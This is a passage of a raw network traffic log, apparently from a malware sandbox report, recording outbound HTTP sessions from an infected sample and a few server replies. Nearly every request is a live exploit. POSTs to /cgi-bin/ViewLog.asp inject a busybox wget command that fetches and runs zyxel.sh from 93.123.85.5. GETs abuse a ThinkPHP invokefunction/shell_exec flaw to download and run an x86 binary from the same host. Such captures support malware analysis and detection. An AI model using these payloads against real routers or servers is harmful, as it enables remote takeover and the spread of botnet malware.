                                                              Nov 13, 2023 22:19:19.627291918 CET9813OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                              Nov 13, 2023 22:19:23.722512960 CET10330OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                              Nov 13, 2023 22:19:31.657605886 CET11258OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                              Nov 13, 2023 22:19:47.527412891 CET13245OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                              Nov 13, 2023 22:20:19.523226976 CET17304OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              471192.168.2.234544262.29.44.1718080
                                                              TimestampkBytes transferredDirectionData
                                                              Nov 13, 2023 22:19:16.689162016 CET9524OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              472192.168.2.233729895.216.69.18880
                                                              TimestampkBytes transferredDirectionData
                                                              Nov 13, 2023 22:19:18.047930956 CET9676OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://93.123.85.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: /
                                                              User-Agent: Uirusu/2.0
                                                              Nov 13, 2023 22:19:18.357306004 CET9696INHTTP/1.1 400 Bad Request
                                                              Date: Mon, 13 Nov 2023 21:19:18 GMT
                                                              Server: Apache/2.4.41 (Ubuntu)
                                                              Content-Length: 305
                                                              Connection: close
                                                              Content-Type: text/html; charset=iso-8859-1
                                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 72 20 62 72 6f 77 73 65 72 20 73 65 6e 74 20 61 20 72 65 71 75 65 73 74 20 74 68 61 74 20 74 68 69 73 20 73 65 72 76 65 72 20 63 6f 75 6c 64 20 6e 6f 74 20 75 6e 64 65 72 73 74 61 6e 64 2e 3c 62 72 20 2f 3e 0a 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 34 31 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 39 35 2e 32 31 36 2e 36 39 2e 31 38 38 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                              Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>400 Bad Request</title></head><body><h1>Bad Request</h1><p>Your browser sent a request that this server could not understand.<br /></p><hr><address>Apache/2.4.41 (Ubuntu) Server at 95.216.69.188 Port 80</address></body></html>


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              473192.168.2.234161295.214.25.15780
                                                              TimestampkBytes transferredDirectionData
                                                              Nov 13, 2023 22:19:18.060889006 CET9677OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://93.123.85.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: /
                                                              User-Agent: Uirusu/2.0
                                                              Nov 13, 2023 22:19:18.383683920 CET9698INHTTP/1.1 400 Bad Request
                                                              Date: Mon, 13 Nov 2023 21:19:18 GMT
                                                              Server: Apache/2.4.56 (Debian)
                                                              Content-Length: 305
                                                              Connection: close
                                                              Content-Type: text/html; charset=iso-8859-1
                                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 72 20 62 72 6f 77 73 65 72 20 73 65 6e 74 20 61 20 72 65 71 75 65 73 74 20 74 68 61 74 20 74 68 69 73 20 73 65 72 76 65 72 20 63 6f 75 6c 64 20 6e 6f 74 20 75 6e 64 65 72 73 74 61 6e 64 2e 3c 62 72 20 2f 3e 0a 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 35 36 20 28 44 65 62 69 61 6e 29 20 53 65 72 76 65 72 20 61 74 20 39 35 2e 32 31 34 2e 32 35 2e 31 35 38 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                              Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>400 Bad Request</title></head><body><h1>Bad Request</h1><p>Your browser sent a request that this server could not understand.<br /></p><hr><address>Apache/2.4.56 (Debian) Server at 95.214.25.158 Port 80</address></body></html>


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              474192.168.2.233954695.129.60.21880
                                                              TimestampkBytes transferredDirectionData
                                                              Nov 13, 2023 22:19:18.072237015 CET9678OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://93.123.85.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: /
                                                              User-Agent: Uirusu/2.0
                                                              Nov 13, 2023 22:19:18.406883955 CET9699INHTTP/1.0 400 Bad Request
                                                              Connection: close
                                                              Content-Length: 113
                                                              Date: Mon, 13 Nov 2023 21:19:18 GMT
                                                              Expires: 0
                                                              Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 30 3a 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 45 72 72 6f 72 20 34 30 30 3a 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
                                                              Data Ascii: <html><head><title>Error 400: Bad Request</title></head><body><h1>Error 400: Bad Request</h1></body></html>


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              475192.168.2.234117895.242.112.7180
                                                              TimestampkBytes transferredDirectionData
                                                              Nov 13, 2023 22:19:18.080091000 CET9678OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://93.123.85.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: /
                                                              User-Agent: Uirusu/2.0


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              476192.168.2.234684831.136.77.38080
                                                              TimestampkBytes transferredDirectionData
                                                              Nov 13, 2023 22:19:18.331037998 CET9692OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                              Nov 13, 2023 22:19:19.339230061 CET9808OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                              Nov 13, 2023 22:19:21.354897022 CET10053OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                              Nov 13, 2023 22:19:25.514336109 CET10520OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                              Nov 13, 2023 22:19:33.705291986 CET11527OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                              Nov 13, 2023 22:19:49.831090927 CET13604OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                              Nov 13, 2023 22:20:23.618700981 CET17804OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              477192.168.2.234319494.187.118.578080
                                                              TimestampkBytes transferredDirectionData
                                                              Nov 13, 2023 22:19:18.344008923 CET9694OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              478192.168.2.234473088.137.133.10180
                                                              TimestampkBytes transferredDirectionData
                                                              Nov 13, 2023 22:19:18.351057053 CET9695OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://93.123.85.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: /
                                                              User-Agent: Uirusu/2.0
                                                              Nov 13, 2023 22:19:19.275106907 CET9807OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://93.123.85.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: /
                                                              User-Agent: Uirusu/2.0
                                                              Nov 13, 2023 22:19:21.130882025 CET10038OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://93.123.85.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: /
                                                              User-Agent: Uirusu/2.0
                                                              Nov 13, 2023 22:19:25.002357960 CET10504OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://93.123.85.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: /
                                                              User-Agent: Uirusu/2.0
                                                              Nov 13, 2023 22:19:32.425448895 CET11376OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://93.123.85.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: /
                                                              User-Agent: Uirusu/2.0
                                                              Nov 13, 2023 22:19:47.271537066 CET13239OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://93.123.85.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: /
                                                              User-Agent: Uirusu/2.0
                                                              Nov 13, 2023 22:20:17.475514889 CET17041OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://93.123.85.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: /
                                                              User-Agent: Uirusu/2.0


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              479192.168.2.235372294.182.207.1338080
                                                              TimestampkBytes transferredDirectionData
                                                              Nov 13, 2023 22:19:18.438251019 CET9700OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                              Nov 13, 2023 22:19:19.296999931 CET9807INHTTP/1.1 404 Not Found
                                                              Date: Tue, 14 Nov 2023 00:49:26 GMT
                                                              Server: Webs
                                                              X-Frame-Options: SAMEORIGIN
                                                              X-Content-Type-Options: nosniff
                                                              X-XSS-Protection: 1;mode=block
                                                              Cache-Control: no-store
                                                              Content-Length: 166
                                                              Content-Type: text/html
                                                              Connection: keep-alive
                                                              Keep-Alive: timeout=60, max=99
                                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 44 6f 63 75 6d 65 6e 74 20 45 72 72 6f 72 3a 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 3c 68 32 3e 41 63 63 65 73 73 20 45 72 72 6f 72 3a 20 34 30 34 20 2d 2d 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 70 3e 43 61 6e 27 74 20 6f 70 65 6e 20 55 52 4c 3c 2f 70 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                              Data Ascii: <!DOCTYPE html><html><head><title>Document Error: Not Found</title></head><body><h2>Access Error: 404 -- Not Found</h2><p>Can't open URL</p></body></html>


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              48192.168.2.234015631.200.28.1308080
                                                              TimestampkBytes transferredDirectionData
                                                              Nov 13, 2023 22:18:16.337589979 CET2077OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              480192.168.2.233741285.122.198.18080
                                                              TimestampkBytes transferredDirectionData
                                                              Nov 13, 2023 22:19:18.634510994 CET9702OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              481192.168.2.234285085.229.181.1488080
                                                              TimestampkBytes transferredDirectionData
                                                              Nov 13, 2023 22:19:18.645044088 CET9703OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              482192.168.2.235807631.136.216.628080
                                                              TimestampkBytes transferredDirectionData
                                                              Nov 13, 2023 22:19:18.658937931 CET9704OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                              Nov 13, 2023 22:19:19.659106016 CET9823OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
